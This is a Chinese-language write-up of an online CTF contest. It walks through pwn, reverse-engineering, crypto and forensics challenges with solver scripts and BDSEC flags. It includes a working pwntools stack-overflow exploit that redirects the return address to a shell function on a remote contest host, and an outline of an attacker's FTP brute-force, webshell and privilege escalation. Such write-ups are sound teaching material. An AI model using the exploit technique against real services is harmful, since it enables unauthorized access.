组队参加了个国外的小线上赛,题目比较简单
目录
pwn只有一道题是个ret2system ,gets读数据到栈内,导致溢出,并且没有开canary和PIE直接溢出将shell写到ret里
int heath_check()
{
char s1[256]; // [rsp+0h] [rbp-100h] BYREF
printf("\x1B[0;32mEnter Password:\n\x1B[0m");
gets(s1);
if ( strcmp(s1, "hAcK_Th3_Pl@n3t") )
{
printf("\x1B[41mWrong Password!!!!\n\x1B[0m");
_exit(0);
}
printf("\x1B[4;32mEnter Password:\n\x1B[0m");
return system("top -b -n 1");
}
int shell()
{
return system("/bin/sh");
}但有个小问题,直接写shell地址不行,需要跳过rbp从lea rax /bin/sh开始
.text:00000000004013A0 ; int shell()
.text:00000000004013A0 public shell
.text:00000000004013A0 shell proc near
.text:00000000004013A0 ; __unwind {
.text:00000000004013A0 F3 0F 1E FA endbr64
.text:00000000004013A4 55 push rbp
.text:00000000004013A5 48 89 E5 mov rbp, rsp
.text:00000000004013A8 48 8D 05 86 13 00 00 lea rax, command ; "/bin/sh"
.text:00000000004013AF 48 89 C7 mov rdi, rax ; command
.text:00000000004013B2 E8 29 FD FF FF call _system
.text:00000000004013B2
.text:00000000004013B7 90 nop
.text:00000000004013B8 5D pop rbp
.text:00000000004013B9 C3 retn
.text:00000000004013B9 ; } // starts at 4013A0
.text:00000000004013B9
.text:00000000004013B9 shell endp完整WP
from pwn import *
context(arch='amd64', log_level='debug')
elf = ELF('./pwnrace')
#p = process('./pwnrace')
p = remote('159.223.101.241', 31337)
#gdb.attach(p, 'b*0x401400')
#pause()
sleep(0.2)
p.sendlineafter(b'Password', b"hAcK_Th3_Pl@n3t".ljust(0x108, b'\x00')+ p64(0x4013a8))
p.sendline(b'cat flag')
p.interactive()
#BDSEC{pwn_is_the_way_to_haven}
主程序调用ns_1然后直接比较
int __fastcall ns_2(const char *a1)
{
int v2; // [rsp+14h] [rbp-ACh]
int i; // [rsp+18h] [rbp-A8h]
int v4[34]; // [rsp+20h] [rbp-A0h]
unsigned __int64 v5; // [rsp+A8h] [rbp-18h]
v5 = __readfsqword(0x28u);
if ( strlen(a1) > 0x1F || strlen(a1) <= 0x1E )
return puts("Invalid license key. Please try again.");// 长度0x1f
v4[0] = 71;
v4[1] = 91;
v4[2] = 43;
v4[3] = 101;
v4[4] = 81;
v4[5] = 326;
v4[6] = 806;
v4[7] = 99;
v4[8] = 104;
v4[9] = 20;
v4[10] = 16;
v4[11] = 40;
v4[12] = 20;
v4[13] = 64;
v4[14] = 104;
v4[15] = 406;
v4[16] = 20;
v4[17] = 104;
v4[18] = 706;
v4[19] = 20;
v4[20] = 416;
v4[21] = 64;
v4[22] = 89;
v4[23] = 26;
v4[24] = 99;
v4[25] = 64;
v4[26] = 10;
v4[27] = 89;
v4[28] = 10;
v4[29] = 10;
v4[30] = 526;
v2 = 0;
for ( i = 0; i < strlen(a1); ++i )
{
if ( (unsigned int)ns_1((unsigned int)a1[i]) + 5 != v4[i] )
{
v2 = 0;
break;
}
v2 = 1;
}
if ( v2 == 1 )
return puts("Congrats ! You found the right license key.");
else
return puts("Invalid license key. Please try again.");
}
__int64 __fastcall ns_1(int a1)
{
unsigned int v3; // [rsp+Ch] [rbp-8h]
v3 = 0;
while ( a1 )
{
v3 = 10 * v3 + a1 % 10;
a1 /= 10;
}
return v3;
}WP
c =[71,91,43,101,81,326,806,99,104,20,16,40,20,64,104,406,20,104,706,20,416,64,89,26,99,64,10,89,10,10,526]
def ns_1(a1):
v3 = 0;
while a1 != 0:
v3 = 10 * v3 + (a1 % 10);
a1 //= 10;
return v3;
flag = ''
for i in c:
for j in range(0x21, 0x7f):
if (ns_1(j) + 5) == i:
flag+=chr(j)
break
print(flag)
#BDSEC{l1c3n53_ch3ck3r_0x1_2022} 提示是patch me if you can! 其实不用patch只是加密逻辑不在main里,直接找到即可,s里是65再对应加上v3
unsigned __int64 rrqqq()
{
int i; // [rsp+Ch] [rbp-44h]
char s[32]; // [rsp+10h] [rbp-40h] BYREF
char v3[19]; // [rsp+30h] [rbp-20h]
char v4[2]; // [rsp+43h] [rbp-Dh] BYREF
unsigned __int64 v5; // [rsp+48h] [rbp-8h]
v5 = __readfsqword(0x28u);
v3[0] = 1;
v3[1] = 3;
v3[2] = 18;
v3[3] = 4;
v3[4] = 2;
v3[5] = 58;
v3[6] = 40;
v3[7] = 30;
v3[8] = -1;
v3[9] = 12;
v3[10] = 30;
v3[11] = -1;
v3[12] = 30;
v3[13] = 17;
v3[14] = 4;
v3[15] = 30;
v3[16] = 45;
v3[17] = -17;
v3[18] = -17;
qmemcpy(v4, "!<", sizeof(v4));
memset(s, 65, 0x15uLL);
for ( i = 0; i <= 20; ++i )
s[i] += v3[i];
puts(s);
return v5 - __readfsqword(0x28u);
}WP
#rrqqq()
c = [1,3,18,4,2,58,40,30,-1,12,30,-1,30,17,4,30,45,-17,-17, 33,60]
print(bytes([v+65 for v in c]))
#BDSEC{i_@M_@_RE_n00b}这个同上个基本一样,主逻辑在ox里,先给出串然后按指定顺序输出
qmemcpy(v28, "dyb}_0SBhCgtUarDiEH{u", sizeof(v28));
v0 = std::operator<<<std::char_traits<char>>(&std::cout, 66LL);
v1 = std::operator<<<std::char_traits<char>>(v0, (unsigned int)v28[15]);
v2 = std::operator<<<std::char_traits<char>>(v1, (unsigned int)v28[6]);
v3 = std::operator<<<std::char_traits<char>>(v2, (unsigned int)v28[17]);
v4 = std::operator<<<std::char_traits<char>>(v3, (unsigned int)v28[9]);
v5 = std::operator<<<std::char_traits<char>>(v4, (unsigned int)v28[19]);
v6 = std::operator<<<std::char_traits<char>>(v5, (unsigned int)v28[18]);
v7 = std::operator<<<std::char_traits<char>>(v6, (unsigned int)v28[20]);
v8 = std::operator<<<std::char_traits<char>>(v7, (unsigned int)v28[14]);
v9 = std::operator<<<std::char_traits<char>>(v8, (unsigned int)v28[14]);
v10 = std::operator<<<std::char_traits<char>>(v9, (unsigned int)v28[13]);
v11 = std::operator<<<std::char_traits<char>>(v10, (unsigned int)v28[8]);
v12 = std::operator<<<std::char_traits<char>>(v11, (unsigned int)v28[4]);
v13 = std::operator<<<std::char_traits<char>>(v12, (unsigned int)v28[12]);
v14 = std::operator<<<std::char_traits<char>>(v13, (unsigned int)v28[4]);
v15 = std::operator<<<std::char_traits<char>>(v14, (unsigned int)v28[10]);
v16 = std::operator<<<std::char_traits<char>>(v15, (unsigned int)v28[5]);
v17 = std::operator<<<std::char_traits<char>>(v16, (unsigned int)v28[11]);
v18 = std::operator<<<std::char_traits<char>>(v17, (unsigned int)v28[4]);
v19 = std::operator<<<std::char_traits<char>>(v18, (unsigned int)v28[16]);
v20 = std::operator<<<std::char_traits<char>>(v19, (unsigned int)v28[11]);
v21 = std::operator<<<std::char_traits<char>>(v20, (unsigned int)v28[4]);
v22 = std::operator<<<std::char_traits<char>>(v21, (unsigned int)v28[2]);
v23 = std::operator<<<std::char_traits<char>>(v22, (unsigned int)v28[20]);
v24 = std::operator<<<std::char_traits<char>>(v23, (unsigned int)v28[0]);
v25 = std::operator<<<std::char_traits<char>>(v24, (unsigned int)v28[0]);
v26 = std::operator<<<std::char_traits<char>>(v25, (unsigned int)v28[1]);
std::operator<<<std::char_traits<char>>(v26, (unsigned int)v28[3]);
return 0LL;WP
#ox()
c = "dyb}_0SBhCgtUarDiEH{u"
a = [15,6,17,9,19,18,20,14,14,13,8,4,12,4,10,5,11,4,16,11,4,2,20,0,0,1,3]
flag = 'B'
for i in a:
flag+=c[i]
print(flag)
#BDSEC{Hurrah_U_g0t_it_buddy}真以为重了,同上
qmemcpy(v21, "_YDPCSeEBzZ3aA{}", sizeof(v21));
std::operator<<<std::char_traits<char>>(
&std::cout,
"\nThat was easy right?\n\nBy the way,\nHere is your flag:\n\n",
a3);
v3 = std::operator<<<std::char_traits<char>>(&std::cout, (unsigned int)v21[8]);
v4 = std::operator<<<std::char_traits<char>>(v3, (unsigned int)v21[2]);
v5 = std::operator<<<std::char_traits<char>>(v4, (unsigned int)v21[5]);
v6 = std::operator<<<std::char_traits<char>>(v5, (unsigned int)v21[7]);
v7 = std::operator<<<std::char_traits<char>>(v6, (unsigned int)v21[4]);
v8 = std::operator<<<std::char_traits<char>>(v7, (unsigned int)v21[14]);
v9 = std::operator<<<std::char_traits<char>>(v8, (unsigned int)v21[11]);
v10 = std::operator<<<std::char_traits<char>>(v9, (unsigned int)v21[12]);
v11 = std::operator<<<std::char_traits<char>>(v10, (unsigned int)v21[10]);
v12 = std::operator<<<std::char_traits<char>>(v11, (unsigned int)v21[1]);
v13 = std::operator<<<std::char_traits<char>>(v12, (unsigned int)v21[0]);
v14 = std::operator<<<std::char_traits<char>>(v13, (unsigned int)v21[3]);
v15 = std::operator<<<std::char_traits<char>>(v14, (unsigned int)v21[6]);
v16 = std::operator<<<std::char_traits<char>>(v15, (unsigned int)v21[13]);
v17 = std::operator<<<std::char_traits<char>>(v16, (unsigned int)v21[9]);
v18 = std::operator<<<std::char_traits<char>>(v17, (unsigned int)v21[1]);
v19 = std::operator<<<std::char_traits<char>>(v18, (unsigned int)v21[15]);
std::ostream::operator<<(v19, &std::endl<char,std::char_traits<char>>);
return 0LL;#fg()
c = "_YDPCSeEBzZ3aA{}"
a = [8,2,5,7,4,14,11,12,10,1,0,3,6,13,9,1,15]
flag = ''
for i in a:
flag+=c[i]
print(flag)
#BDSEC{3aZY_PeAzY}这个输入以后直接比较,
printf("Flag? ");
fgets(v8, 73, stdin);
v3 = strlen(v8);
v4 = 0LL;
v5 = v3 - 1;
do
{
if ( v5 == v4 )
{
puts("Congratulations password iss your flag");
return 0;
}
v6 = v8[v4++];
}
while ( v6 == LOBYTE(flag[v4 - 1]) );.rodata:0000000000002960 42 00 44 00 45 00 43 00 7B 00+text "UTF-16LE", 'BDEC{this_Start_your_re_journey}'看上去很复杂,但仔细理一下,就是把大小写分开作个循环移位然后反向一次
int __cdecl main(int argc, const char **argv, const char **envp)
{
char v4; // [rsp+5h] [rbp-13Bh]
char v5; // [rsp+5h] [rbp-13Bh]
char v6; // [rsp+5h] [rbp-13Bh]
int j; // [rsp+8h] [rbp-138h]
int k; // [rsp+8h] [rbp-138h]
int m; // [rsp+8h] [rbp-138h]
int v10; // [rsp+Ch] [rbp-134h]
int i; // [rsp+10h] [rbp-130h]
int v12; // [rsp+14h] [rbp-12Ch]
char v13; // [rsp+1Ch] [rbp-124h]
int v14[40]; // [rsp+20h] [rbp-120h]
char s[104]; // [rsp+C0h] [rbp-80h] BYREF
unsigned __int64 v16; // [rsp+128h] [rbp-18h]
v16 = __readfsqword(0x28u);
v10 = 0;
v14[0] = 125;
v14[1] = 120;
v14[2] = 84;
v14[3] = 110;
v14[4] = 83;
v14[5] = 119;
v14[6] = 95;
v14[7] = 84;
v14[8] = 84;
v14[9] = 109;
v14[10] = 87;
v14[11] = 111;
v14[12] = 95;
v14[13] = 109;
v14[14] = 84;
v14[15] = -128;
v14[16] = 82;
v14[17] = 122;
v14[18] = 87;
v14[19] = 120;
v14[20] = 95;
v14[21] = 84;
v14[22] = 110;
v14[23] = 105;
v14[24] = 84;
v14[25] = 120;
v14[26] = 88;
v14[27] = -127;
v14[28] = 95;
v14[29] = 110;
v14[30] = 73;
v14[31] = 100;
v14[32] = 123;
v14[33] = 82;
v14[34] = 84;
v14[35] = 72;
v14[36] = 83;
v14[37] = 81;
puts("\t----------------------------");
puts("\t BDSEC License Checker 0x03");
puts("\t----------------------------\n");
printf("Please enter your license to continue : ");
gets(s, argv);
if ( strlen(s) == 38 )
{
for ( i = 0; i < strlen(s); ++i )
{
if ( s[i] <= 64 || s[i] > 90 )
{
if ( s[i] > 96 && s[i] <= 122 )
{
if ( s[i] <= 96 || s[i] > 109 ) // 小写字母ROT13
s[i] -= 13;
else
s[i] += 13;
}
}
else if ( s[i] <= 63 || s[i] > 77 )
{ // 大写
s[i] -= 13;
}
else
{
s[i] += 13;
}
}
v12 = strlen(s);
for ( j = 0; j < v12 / 2; ++j ) // 反向
{
v13 = s[j];
s[j] = s[v12 - j - 1];
s[v12 - j - 1] = v13;
}
for ( k = 0; s[k]; ++k )
{
v4 = s[k];
if ( v4 <= 96 || v4 > 122 )
{
if ( v4 > 64 && v4 <= 90 )
{ // 大写右移2位
v6 = v4 + 2;
if ( v6 > 90 )
v6 -= 26;
s[k] = v6;
}
}
else
{
v5 = v4 + 8; // 小写右移8位
if ( v5 > 122 )
v5 -= 26;
s[k] = v5;
}
}
for ( m = 0; m < strlen(s); ++m )
{
if ( s[m] != v14[m] )
{
v10 = 0;
break;
}
v10 = 1;
}
if ( v10 == 1 )
puts(
"Congratulations for finding the right license key. I wish I had premium service for you :P But you can get point"
"s by submitting the license key.");
else
puts("Invalid license key. Please try again.");
}
else
{
puts("Invalid license key. Please try again.");
}
return 0;
}但这有个小坑点:对比串里有-128和-127这两个数逆不回来,所以这两个字母是根据单词猜的
c = [125,120,84,110,83,119,95,84,84,109,87,111,95,109,84,128,82,122,87,120,95,84,110,105,84,120,88,129,95,110,73,100,123,82,84,72,83,81]
flag = ''
for i in c:
if i>=ord('A') and i<=ord('Z'):
i -=2
if i<ord('A'):
i+=26
elif i>=ord('a') and i<=ord('z'):
i -=8
if i<ord('a'):
i+=26
if i>=ord('A') and i<=ord('Z'):
if i<ord('A')+13:
i+=13
else:
i-=13
elif i>=ord('a') and i<=ord('z'):
if i<ord('a')+13:
i+=13
else:
i-=13
flag+=chr(i)
print(flag[::-1])
#BDSEC{iTs_IcEnsE_cHeCEr_tHrEE_bDsEc} 猜两个词
#BDSEC{iTs_lIcEnsE_cHeCkEr_tHrEE_bDsEc}这个是先出的,但是分值高排后边了
跟3相似,只是没有反向,可以直接爆破,不需要理解
v10 = 65;
v9 = 63;
v11 = 0;
v5[0] = 109;
v5[1] = 111;
v5[2] = 126;
v5[3] = 112;
v5[4] = 110;
v5[5] = 128;
v5[6] = 119;
v5[7] = 116;
v5[8] = 110;
v5[9] = 112;
v5[10] = 121;
v5[11] = 58;
v5[12] = 56;
v5[13] = 100;
v5[14] = 110;
v5[15] = 115;
v5[16] = 112;
v5[17] = 110;
v5[18] = 118;
v5[19] = 56;
v5[20] = 125;
v5[21] = 100;
v5[22] = 53;
v5[23] = 105;
v5[24] = 53;
v5[25] = 55;
v5[26] = 100;
v5[27] = 55;
v5[28] = 53;
v5[29] = 55;
v5[30] = 55;
v5[31] = 100;
v5[32] = 121;
v5[33] = 58;
v5[34] = 130;
puts("\t----------------------------");
puts("\t BDSEC License Checker 0x02");
puts("\t----------------------------\n");
printf("Please enter your license to continue : ");
gets(s, argv);
if ( strlen(s) == 35 )
{
for ( i = 0; s[i]; ++i )
{
if ( s[i] > 96 && s[i] <= 122 )
s[i] -= 32;
}
for ( i = 0; s[i]; ++i )
{
if ( s[i] > 64 && s[i] <= 90 )
s[i] += 32;
}
for ( i = 0; s[i]; ++i )
{
v13 = s[i];
if ( v13 <= 96 || v13 > 122 )
{
if ( v13 > 64 && v13 <= 90 )
{
v7 = v9 % 10;
v13 += v9 % 10;
if ( v13 > 90 )
v13 -= 26;
s[i] = v13;
}
}
else
{
v7 = v10 % 10;
v13 += v10 % 10;
if ( v13 > 122 )
v13 -= 26;
s[i] = v13;
}
}
for ( i = 0; s[i]; ++i )
{
v13 = s[i];
if ( v13 <= 96 || v13 > 122 )
{
if ( v13 > 64 && v13 <= 90 )
{
v7 = v9 % 4;
v13 += v9 % 4;
if ( v13 > 90 )
v13 -= 26;
s[i] = v13;
}
}
else
{
v7 = v10 % 4;
v13 += v10 % 4;
if ( v13 > 122 )
v13 -= 26;
s[i] = v13;
}
}
for ( i = 0; ; ++i )
{
v3 = i;
if ( v3 >= strlen(s) )
break;
v8 = s[i];
if ( v5[i] != v8 + 5 )
{
v11 = 0;
break;
}
v11 = 1;
}
if ( v11 == 1 )
puts(
"Congratulations for finding the right license key. I wish I had premium service for you :P But you can get point"
"s by submitting the license key.");
else
puts("Invalid license key. Please try again.");
}
else
{
puts("Invalid license key. Please try again.");
}
return 0;原文翻译爆破即可
c =[109,111,126,112,110,128,119,116,110,112,121,58,56,100,110,115,112,110,118,56,125,100,53,105,53,55,100,55,53,55,55,100,121,58,130]
v9 = 63
v10 = 65
flag = ''
for i in range(35):
for jj in range(0x21,0x7f):
j = jj
if j>96 and j<=122:
j -=32
if j>64 and j<=90:
j +=32
tj = j
if tj<=96 or tj> 122:
if tj>64 and tj <=90:
tj += v9 %10
if tj > 90:
tj -=26
j = tj
else:
tj += v10 % 10
if tj > 122:
tj -=26
j = tj
tj = j
if tj <=96 or tj>122:
if tj >64 and tj <=90:
tj += v9 %4
if tj >90 :
tj -=26
j = tj
else:
tj += v10%4
if tj > 122:
tj -=26
j = tj
if j+5 == c[i]:
flag += chr(jj)
break
print(flag)
#BDSEC{LICEN53_CHECK3R_0X02_2022_N5}给的密文cipher.txt,提示:I convert plain text to cipher text by using Cryptocode library . Always Remember BDSEC is a KEY . 这个看了提示就明白了用cryptocode库
c00EtfL9GPq2EItQrkFyPKIMfVFZy0O4ssXtr/V2Io7NMbNS*Brue6Cex4JuWkWU0lUEK2w==*f8EsezuHu2WBstRDlWZiLg==*CZ/4FNMavWZu3kznPrAyeg==import cryptocode
myDecryptedMessage = cryptocode.decrypt("c00EtfL9GPq2EItQrkFyPKIMfVFZy0O4ssXtr/V2Io7NMbNS*Brue6Cex4JuWkWU0lUEK2w==*f8EsezuHu2WBstRDlWZiLg==*CZ/4FNMavWZu3kznPrAyeg==", "BDSEC")
print(myDecryptedMessage)
#BDSEC{cryp70_and_pyth0n_ar3_aw3s0me}题目:
My friend gave me his game username and game id . Can decode game id ?
User : rot
Game ID : OQFRP{pelcg0_ne3_nj3f0z3}这个是ROT13
BDSEC{crypt0_ar3_aw3s0m3}这个没弄出来,分数很低但确实没作出来,也许是非常简单的加密方法,但确实想不出是哪个
My friend gave me his VIP account credential and he said to me decode my password .
User : twin13
password : 3ip2uq3mj5z95oj59s4q654j4q65hv5746oj4o64pz5644pz18f1bm5tx4v35z95oj59s6w0一大篇文章
Dear E-Commerce professional ; This letter was specially
selected to be sent to you . This is a one time mailing
there is no need to request removal if you won't want
any more . This mail is being sent in compliance with
Senate bill 1624 , Title 1 , Section 302 ! This is
not a get rich scheme ! Why work for somebody else
when you can become rich as few as 60 WEEKS . Have
you ever noticed how long the line-ups are at bank
machines plus how long the line-ups are at bank machines
! Well, now is your chance to capitalize on this .
We will help you use credit cards on your website plus
increase customer response by 140% ! You can begin
at absolutely no cost to you ! But don't believe us
! Prof Jones who resides in Massachusetts tried us
and says "Now I'm rich, Rich, RICH" . This offer is
100% legal ! We IMPLORE you - act now . Sign up a friend
and you get half off ! God Bless . Dear Internet user
; This letter was specially selected to be sent to
you . If you are not interested in our publications
and wish to be removed from our lists, simply do NOT
respond and ignore this mail . This mail is being sent
in compliance with Senate bill 2016 , Title 9 , Section
302 . This is different than anything else you've seen
! Why work for somebody else when you can become rich
within 92 days . Have you ever noticed society seems
to be moving faster and faster plus nobody is getting
any younger . Well, now is your chance to capitalize
on this . WE will help YOU use credit cards on your
website & decrease perceived waiting time by 140% .
You can begin at absolutely no cost to you ! But don't
believe us ! Ms Ames who resides in Alaska tried us
and says "I was skeptical but it worked for me" . We
are a BBB member in good standing . Do not delay -
order today . Sign up a friend and you get half off
. Thank-you for your serious consideration of our offer
! Dear Business person ; This letter was specially
selected to be sent to you . If you no longer wish
to receive our publications simply reply with a Subject:
of "REMOVE" and you will immediately be removed from
our directory . This mail is being sent in compliance
with Senate bill 2416 , Title 1 , Section 304 . Do
NOT confuse us with Internet scam artists . Why work
for somebody else when you can become rich within 30
DAYS . Have you ever noticed nobody is getting any
younger and nearly every commercial on television has
a .com on in it . Well, now is your chance to capitalize
on this . WE will help YOU process your orders within
seconds plus process your orders within seconds ! You
are guaranteed to succeed because we take all the risk
. But don't believe us . Mrs Simpson who resides in
Alabama tried us and says "My only problem now is where
to park all my cars" ! We are licensed to operate in
all states . We BESEECH you - act now ! Sign up a friend
and your friend will be rich too ! God Bless . Dear
Business person , Thank-you for your interest in our
publication ! We will comply with all removal requests
! This mail is being sent in compliance with Senate
bill 2416 , Title 1 , Section 301 ! THIS IS NOT MULTI-LEVEL
MARKETING . Why work for somebody else when you can
become rich within 10 WEEKS ! Have you ever noticed
more people than ever are surfing the web and people
love convenience . Well, now is your chance to capitalize
on this ! We will help you process your orders within
seconds and deliver goods right to the customer's doorstep
. You are guaranteed to succeed because we take all
the risk . But don't believe us . Mr Simpson of Georgia
tried us and says "I've been poor and I've been rich
- rich is better" ! We are a BBB member in good standing
! We urge you to contact us today for your own future
financial well-being ! Sign up a friend and you get
half off . Thanks . Dear Sir or Madam ; You made the
right decision when you signed up for our mailing list
! This is a one time mailing there is no need to request
removal if you won't want any more ! This mail is being
sent in compliance with Senate bill 2216 ; Title 2
; Section 307 ! This is a ligitimate business proposal
! Why work for somebody else when you can become rich
as few as 24 months . Have you ever noticed people
will do almost anything to avoid mailing their bills
plus nobody is getting any younger . Well, now is your
chance to capitalize on this . We will help you increase
customer response by 120% & increase customer response
by 150% . You can begin at absolutely no cost to you
! But don't believe us ! Mrs Anderson who resides in
New York tried us and says "I was skeptical but it
worked for me" . We are licensed to operate in all
states ! So make yourself rich now by ordering immediately
. Sign up a friend and you'll get a discount of 90%
. Best regards . Dear Cybercitizen , Especially for
you - this red-hot announcement ! We will comply with
all removal requests ! This mail is being sent in compliance
with Senate bill 1621 ; Title 4 ; Section 302 ! This
is NOT unsolicited bulk mail . Why work for somebody
else when you can become rich within 78 days ! Have
you ever noticed nobody is getting any younger & most
everyone has a cellphone ! Well, now is your chance
to capitalize on this . WE will help YOU SELL MORE
plus turn your business into an E-BUSINESS ! You can
begin at absolutely no cost to you ! But don't believe
us ! Mrs Jones who resides in North Dakota tried us
and says "My only problem now is where to park all
my cars" . We are a BBB member in good standing . We
beseech you - act now ! Sign up a friend and you'll
get a discount of 10% . Thank-you for your serious
consideration of our offer . Dear Friend , Your email
address has been submitted to us indicating your interest
in our publication ! We will comply with all removal
requests . This mail is being sent in compliance with
Senate bill 1623 , Title 7 , Section 303 . THIS IS
NOT A GET RICH SCHEME . Why work for somebody else
when you can become rich inside 58 MONTHS . Have you
ever noticed nobody is getting any younger plus nearly
every commercial on television has a .com on in it
! Well, now is your chance to capitalize on this !
WE will help YOU process your orders within seconds
& decrease perceived waiting time by 140% ! You can
begin at absolutely no cost to you ! But don't believe
us . Ms Simpson of New Hampshire tried us and says
"Now I'm rich many more things are possible" . This
offer is 100% legal ! Do not delay - order today .
Sign up a friend and you'll get a discount of 10% .
Thank-you for your serious consideration of our offer
! Dear Colleague ; Your email address has been submitted
to us indicating your interest in our newsletter !
If you no longer wish to receive our publications simply
reply with a Subject: of "REMOVE" and you will immediately
be removed from our mailing list . This mail is being
sent in compliance with Senate bill 1619 , Title 9
; Section 304 ! This is NOT unsolicited bulk mail .
Why work for somebody else when you can become rich
as few as 82 months . Have you ever noticed the baby
boomers are more demanding than their parents plus
more people than ever are surfing the web . Well, now
is your chance to capitalize on this ! We will help
you turn your business into an E-BUSINESS & use credit
cards on your website . You can begin at absolutely
no cost to you . But don't believe us ! Prof Ames of
Michigan tried us and says "I was skeptical but it
worked for me" ! We assure you that we operate within
all applicable laws . For the sake of your family order
now . Sign up a friend and your friend will be rich
too . Cheers ! Dear Internet user , Especially for
you - this hot announcement . We will comply with all
removal requests . This mail is being sent in compliance
with Senate bill 1623 ; Title 6 , Section 309 . This
is NOT unsolicited bulk mail . Why work for somebody
else when you can become rich inside 11 weeks ! Have
you ever noticed people will do almost anything to
avoid mailing their bills plus how long the line-ups
are at bank machines ! Well, now is your chance to
capitalize on this . WE will help YOU deliver goods
right to the customer's doorstep and use credit cards
on your website . You are guaranteed to succeed because
we take all the risk . But don't believe us . Mrs Jones
of Illinois tried us and says "I've been poor and I've
been rich - rich is better" . We assure you that we
operate within all applicable laws . We BESEECH you
- act now ! Sign up a friend and your friend will be
rich too ! Warmest regards . Dear Professional ; Your
email address has been submitted to us indicating your
interest in our briefing ! If you no longer wish to
receive our publications simply reply with a Subject:
of "REMOVE" and you will immediately be removed from
our mailing list . This mail is being sent in compliance
with Senate bill 1623 ; Title 6 ; Section 302 ! This
is not multi-level marketing ! Why work for somebody
else when you can become rich in 99 weeks ! Have you
ever noticed people love convenience and nearly every
commercial on television has a .com on in it ! Well,
now is your chance to capitalize on this ! We will
help you sell more plus deliver goods right to the
customer's doorstep . You can begin at absolutely no
cost to you . But don't believe us ! Prof Ames of South
Carolina tried us and says "My only problem now is
where to park all my cars" . We are licensed to operate
in all states . You have no reason not to act now .
Sign up a friend and you get half off ! Thanks . Dear
Salaryman ; Especially for you - this hot announcement
! If you are not interested in our publications and
wish to be removed from our lists, simply do NOT respond
and ignore this mail ! This mail is being sent in compliance
with Senate bill 1621 , Title 1 , Section 306 . Do
NOT confuse us with Internet scam artists . Why work
for somebody else when you can become rich in 46 days
! Have you ever noticed more people than ever are surfing
the web plus people love convenience ! Well, now is
your chance to capitalize on this ! WE will help YOU
deliver goods right to the customer's doorstep and
process your orders within seconds . You can begin
at absolutely no cost to you ! But don't believe us
. Mr Ames of Virginia tried us and says "Now I'm rich,
Rich, RICH" ! We are a BBB member in good standing
. You will blame yourself forever if you don't order
now . Sign up a friend and you'll get a discount of
10% ! Thanks . 在网站上解码
网站:https://spammimic.com/decode.cgi
结果:Hello Mr.Alex I won't 100000 M USD dolor. Can you want that, you need this key BDSEC{do3sn't_b3li3ve_1n_unkn0wn_mail} 密文没法写,就是用y作了个加密
#! /usr/bin/python3
def x(a, b):
h = ""
for i in range(len(a), len(b)):
t.push(y(b[i]))
return "".join(a)
def y(c):
a = list(c)
for i in range(len(c)):
b = c[i]
for j in range(i + 1, len(c)):
b = chr(ord(b) ^ ord(c[j]))
a[i] = b
return "".join(a)
def z():
flag = open("flag.txt", "r").read()
enc_flag = y(flag)
f = open("encrypted.txt", "w")
f.write(enc_flag)
f.close()
if __name__ == "__main__":
z()
逐个用后边的字符异或,逆向时从后向前作
enc = open("encrypted.txt", "rb").read()
a = [0]*len(enc)
for i in range(len(enc)-1, -1, -1):
b = enc[i]
for j in range(i+1, len(enc)):
b ^= a[j]
a[i] = b
print(bytes(a))
#BDSEC{n0t_50_e45y_hUh?_433}密文:kU1HlnN1aQMBNNRDzX20M73X9RwUTRz9
算法:
def f(t):
c = list(t)
for i in range(len(t)):
for j in range(i, len(t) - 1):
for k in range(j, len(t) - 2):
c[k], c[k+1] = c[k+1], c[k]
return "".join(c)
if __name__ == "__main__":
flag = open("flag.txt", "r").read()
open("ciphertext.txt", "w").write(f(flag))
解法,原程序本向就是个交换位置,只需要弄个同长的串正向得到位置然后找回来即可
def f(t):
c = list(t)
for i in range(len(t)):
for j in range(i, len(t) - 1):
for k in range(j, len(t) - 2):
c[k], c[k+1] = c[k+1], c[k]
return "".join(c)
flag = '0123456789abcdefghijklmnopqrstuv'
print(f(flag))
ttt = '15dtu9cb80gi6sqhnolmf7rke4ja32pv'
c = 'kU1HlnN1aQMBNNRDzX20M73X9RwUTRz9'
d = ''
for i in range(32):
d += c[ttt.index(flag[i])]
from base64 import *
print(b64decode(d))
#BDSEC{ju57_L00p_m3_4w4y}
唯一的一个rsa题,n很小可分解
#N: 1280678415822214057864524798453297819181910621573945477544758171055968245116423923
#E: 65537
#C: 241757357533719849989659127349827982677055294256023833052829147857534659015212862p = 1899107986527483535344517113948531328331
q = 674357869540600933870145899564746495319033
n = 1280678415822214057864524798453297819181910621573945477544758171055968245116423923
e = 65537
c = 241757357533719849989659127349827982677055294256023833052829147857534659015212862
from gmpy2 import *
from Crypto.Util.number import long_to_bytes
phi_n = (p-1)*(q-1)
d = invert(e, phi_n)
m = pow(c, d, n)
print(long_to_bytes(m))
#BDSEC{r54_i5_fUn_r16h7?}哈夫曼编码
密文按编码从头对照,手工处理即可
00101 B
111 D
00110 S
1011 E
1001 C
00111 {
00010 H
01000 u
1000 f
1000 f
00100 m
01011 @
1101 n
1100 _
1011 E
1101 n
00001 c
01100 0
01001 d
01101 1
1101 n
1010 g
1100 _
1010 g
01010 o
01110 7
1100 _
111 D
01111 3
1001 C
00011 O
111 D
01111 3
111 D
00000 }
BDSEC{Huffm@n_Enc0d1ng_go7_D3COD3D}下来一个图片
用binwalk解出数据
Sld xlfow R yv hl olhg
Rm z kozxv R pmld hl dvoo?
Sld xlfow R yv hl yilpvm
Rm z uznrob hl gltvgsvi?
Sld xlfow R yv hl olmvob
Hfiilfmwvw yb hl nzmb?
Sld xlfow R yv hl fmszkkb
Hfiilfmwvw yb hl nfxs yvzfgb?
Sld xlfow R yv nv
Dsvm vevm R ivnzrm z nbhgvib?
YWHVX{N33n_gsv_yfggviuob_tlvh_fk_fk_zmw_zdzb}这个基本就是词频的事了,放到 quipquip.com 上查得到
BDSEC{M33m_the_butterfly_goes_up_up_and_away}这个题有20问,过关形式,过到十几就没走下去
这是一个网络测试攻击抓的包,先是用arp探测然后探测网站,试ftp密码,成功后下载文件,用webshell在网站起9001端口,登入后下载poc程序提权。
-------Victim & Attacker
25
NSTechvally is an multinational hosting & cloud service providing company. Recently we have detected some unusal activity to the server. An attacker got access to our server. And we recently found out that the developer did some mistakes developing our website. We have captured the network traffic. Help us to find out how the attacker compromised our server.
Attachments
capture.pcapng
N.B: This is the challenge file for all the networking challenges.
What is the server ip & the attacker ip? 攻击和服务器的IP
Flag Format: BDSEC{0.0.0.0_127.0.0.1}
BDSEC{192.168.1.13_192.168.1.10}
------Which FTP?
50
What ftp & version the server is using? ftp程序的版本号
Flag Format : BDSEC{ftp_0.0.0}
BDSEC{vsFTPd_3.0.3}
-----FTP Creads
50
What is the ftp username & password? ftp用户名和密码
